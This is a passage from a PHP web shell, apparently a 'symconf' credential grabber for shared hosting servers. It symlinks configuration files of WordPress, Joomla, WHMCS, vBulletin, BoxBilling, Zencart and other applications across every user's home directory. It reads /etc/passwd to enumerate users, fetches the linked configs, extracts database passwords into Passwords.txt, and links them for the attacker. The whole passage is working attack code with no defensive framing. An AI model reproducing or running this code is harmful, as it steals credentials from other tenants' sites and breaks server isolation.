  1902. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1903. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1904. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1905. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1906. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1907. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1908. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1909. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1910. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1911. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1912. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1913. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1914. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1915. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1916. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1917. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1918. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1919. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1920. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1921. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1922. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1923. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1924. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1925. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1926. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1927. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1928. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1929. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1930. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1931. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1932. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1933. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1934. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1935. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1936. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1937. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1938. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1939. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1940. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1941. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1942. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1943. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1944. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1945. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1946. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1947. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1948. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1949. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1950. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1951. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1952. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1953. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1954. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1955. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1956. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1957. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1958. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1959. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1960. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1961. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1962. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1963. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1964. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1965. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1966. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1967. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1968. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1969. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1970. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1971. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1972. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1973.  
  1974. //Home4
  1975.  
  1976. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1977. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1978. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1979. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1980. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1981. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1982. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1983. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1984. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1985. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1986. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1987. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1988. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1989. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1990. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1991. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1992. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1993. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1994. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1995. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1996. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1997. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1998. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1999. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2000. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2001. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2002. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2003. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2004. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2005. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2006. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2007. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2008. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2009. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2010. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2011. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2012. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2013. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2014. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2015. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2016. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2017. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2018. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2019. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2020. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2021. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2022. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2023. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2024. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2025. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2026. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2027. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2028. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2029. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2030. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2031. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2032. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2033. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2034. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2035. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2036. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2037. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2038. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2039. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2040. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2041. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2042. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2043. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2044. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2045. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2046. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2047. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2048. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2049. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2050. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2051. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2052. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2053. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2054. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2055. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2056. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2057. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2058. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2059. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2060. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2061. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2062. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2063. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2064. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2065. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2066. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2067. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2068. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2069. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2070. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2071. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2072. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2073. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2074. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2075. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2076. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2077. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2078. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2079. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2080. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2081. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2082. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2083. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2084. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2085. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2086. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2087. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2088. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2089. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2090. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2091. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2092. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2093. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2094. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2095. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2096. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2097. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2098. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2099. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2100. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2101. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2102. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2103. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2104. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2105. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2106. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2107. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2108. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2109. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2110. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2111. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2112. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2113. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2114. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2115. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2116. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2117. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2118. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2119. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2120. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2121. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2122. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2123. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2124. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2125. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2126. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2127. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2128. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2129. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2130. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2131. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2132. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2133. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2134. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2135. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2136. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2137. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2138. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2139. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2140. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2141. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2142. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2143. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2144. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2145. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2146. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2147. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2148. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2149. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2150. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2151. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2152. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2153. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2154. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2155. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2156.  
  2157. }
  2158.  
  2159. //password grab
  2160.  
  2161. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  2162. {
  2163.  
  2164. $ar0=explode($marqueurDebutLien, $text);
  2165. $ar1=explode($marqueurFinLien, $ar0[1]);
  2166. $ar=trim($ar1[0]);
  2167. return $ar;
  2168. }
  2169.  
  2170. $ffile=fopen('Passwords.txt','a+');
  2171.  
  2172.  
  2173. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/cox_symconf/";
  2174. $re=$r;
  2175. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  2176.  
  2177. $users=file("/etc/passwd");
  2178. foreach($users as $user)
  2179. {
  2180.  
  2181. $str=explode(":",$user);
  2182. $usersss=$str[0];
  2183. foreach($confi as $co)
  2184. {
  2185.  
  2186.  
  2187. $uurl=$re.$usersss.$co;
  2188. $uel=$uurl;
  2189.  
  2190. $ch = curl_init();
  2191.  
  2192. curl_setopt($ch, CURLOPT_URL, $uel);
  2193. curl_setopt($ch, CURLOPT_HEADER, 1);
  2194. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2195. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2196. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  2197. $result['EXE'] = curl_exec($ch);
  2198. curl_close($ch);
  2199. $uxl=$result['EXE'];
  2200.  
  2201.  
  2202. if($uxl && preg_match('/table_prefix/i',$uxl))
  2203. {
  2204.  
  2205. //Wordpress
  2206.  
  2207. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  2208. if(!empty($dbp))
  2209. $pass=$dbp."\n";
  2210. fwrite($ffile,$pass);
  2211.  
  2212. }
  2213. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  2214. {
  2215.  
  2216. //WHMCS
  2217.  
  2218. $dbp=entre2v2($uxl,"db_password = '","';");
  2219. if(!empty($dbp))
  2220. $pass=$dbp."\n";
  2221. fwrite($ffile,$pass);
  2222.  
  2223. }
  2224.  
  2225.  
  2226. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  2227. {
  2228.  
  2229. //Joomla
  2230.  
  2231. $db=entre2v2($uxl,"password = '","';");
  2232. if(!empty($db))
  2233. $pass=$db."\n";
  2234. fwrite($ffile,$pass);
  2235. }
  2236. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  2237. {
  2238.  
  2239. //Vbulletin
  2240.  
  2241. $db=entre2v2($uxl,"password'] = '","';");
  2242. if(!empty($db))
  2243. $pass=$db."\n";
  2244. fwrite($ffile,$pass);
  2245.  
  2246. }
  2247. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  2248. {
  2249.  
  2250. //Other
  2251.  
  2252. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  2253. if(!empty($db))
  2254. $pass=$db."\n";
  2255. fwrite($ffile,$pass);
  2256. }
  2257. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2258. {
  2259.  
  2260. //Other
  2261.  
  2262. $db=entre2v2($uxl,"dbpass = '","';");
  2263. if(!empty($db))
  2264. $pass=$db."\n";
  2265. fwrite($ffile,$pass);
  2266. }
  2267. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2268. {
  2269.  
  2270. //Other
  2271.  
  2272. $db=entre2v2($uxl,"dbpass = '","';");
  2273. if(!empty($db))
  2274. $pass=$db."\n";
  2275. fwrite($ffile,$pass);
  2276.  
  2277. }
  2278. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2279. {
  2280.  
  2281. //Other
  2282.  
  2283. $db=entre2v2($uxl,"dbpass = \"","\";");
  2284. if(!empty($db))
  2285. $pass=$db."\n";
  2286. fwrite($ffile,$pass);
  2287. }
  2288.  
  2289.  
  2290. }
  2291. }
  2292. echo "<center>
  2293. <a href=\"cox_symconf/root/\">Root Server</a>
  2294. <br><a href=\"cox_symconf/Passwords.txt\">Passwords</a>
  2295. <br><a href=\"cox_symconf/\">Configurations</a></center>";
  2296. }
  2297. else
  2298. {
  2299. echo "<center>
  2300. <form method=\"POST\">
  2301. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2302. $file = '/etc/passwd';
  2303. $read = @fopen($file, 'r');
  2304. if ($read){
  2305. $body = @fread($read, @filesize($file));
  2306. echo "".htmlentities($body)."";
  2307. }
  2308. elseif(!$read)
  2309. {
  2310. $read = @show_source($file) ;
  2311. }
  2312. elseif(!$read)
  2313. {
  2314. $read = @highlight_file($file);
  2315. }
  2316. elseif(!$read)
  2317. {
  2318. for($uid=0;$uid<1000;$uid++)
  2319. {
